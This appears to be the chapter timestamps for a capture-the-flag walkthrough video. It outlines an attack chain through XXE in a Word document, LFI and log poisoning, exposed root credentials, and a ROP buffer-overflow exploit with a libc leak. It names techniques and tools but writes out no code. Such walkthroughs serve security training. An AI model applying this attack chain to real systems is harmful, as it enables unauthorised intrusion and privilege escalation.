01:00 - Begin of nmap, there's a weird 8888 port.
03:55 - Looking at the website, downloading a docx
06:30 - Finally running GoBuster, doing the raft wordlist because it has "UpdateDetails"
15:15 - Running GoBuster against the "release" directory to get release notes and researching XML and DocX
22:00 - Adding an XXE Payload into our Word Document: customXml/item1.xml
26:15 - Making an XXE Chain to extract files using HTTP and PHP's Encoder
33:20 - Extracting the Apache Config to see DocRoot, then extracting config.php
37:40 - Exploring LFI Injection into getPatent_alphav1.0.php, explaining what happens with bad regex to remove things.
42:10 - Exploring Log File Poisoning
54:00 - Shell returned on the box, fixing up the TTY and searching for files by creation time
58:30 - There's a file in /opt/, that hints at a cronjob running a task every minute. Running PSPY to see the process creation
01:01:40 - Password is exposed in the command, this is the root password to the docker. Exploring the Cron and /opt/lfm directory
01:11:25 - Exploring the lfm directory and examining old git commit's to get the binary of lfmserver and some old source code.
1:15:00 - Opening up on Ghidra, defining main
1:17:20 - Going into the first piece of the program which looks like an argument check. Looking at the source to verify we are correct.
1:20:30 - Searching for the password in the binary to see where it is used. Use GDB to help us understand what is happening
1:24:30 - Start of creating an exploit script
1:29:50 - Changing the password to ippsec, and looking at it in GDB to confirm a variable... Bunch more playing around learning the binary
1:44:10 - Discover the applicaiton is expecting files to be in /files/, behaves like DOC_ROOT
1:45:10 - Explaining where I think the Buffer Overflow Happens (URLDecode)
1:50:00 - Crashed the applicaiton, discovering the correct spot to overwrite with "pattern create"
1:54:00 - Using Ropper to find some pop gadgets to use, then creating a gadget to leak an address using write(). Then doing a bunch of troubleshooting around MD5Sum to get the code to a spot that triggers our overflow.
2:19:00 - End of troubleshooting that MD5 issue. Viewing what the server is sending in wireshark
2:27:30 - Calculating Memory Offsets based upon the link
2:36:10 - Creating a gadget to map stdin/stdout then execute bash... Then lots of troubleshooting, some encoding issue.
2:42:20 - Memory address looks weird, using GDB to confirm we grabbed the wrong address.
2:49:00 - Calculating where the BinSH String would be located and now our script works locally!
2:51:10 - When going against target, our script isn't even getting the memory leak... Incorrectly thinking there's some ACL based around IP Address. Using an SSH Tunnel to create a reverse tunnel and access the server through the docker
2:55:00 - Realizing the MD5 is wrong since convert.php on our target is different than our box!
2:57:15 - Address leaked! Using libc-database to hunt for the version of libc on the target machine
3:00:00 - Libc-database found the correct libc, modifying our exploit script to use this libc. Then getting a shell
3:05:30 - Running LinPEAS and noticing that /dev/sdb1 is mounted to /root, examining /dev/sda2 to see if there was a /root directory underneat to get root.txt.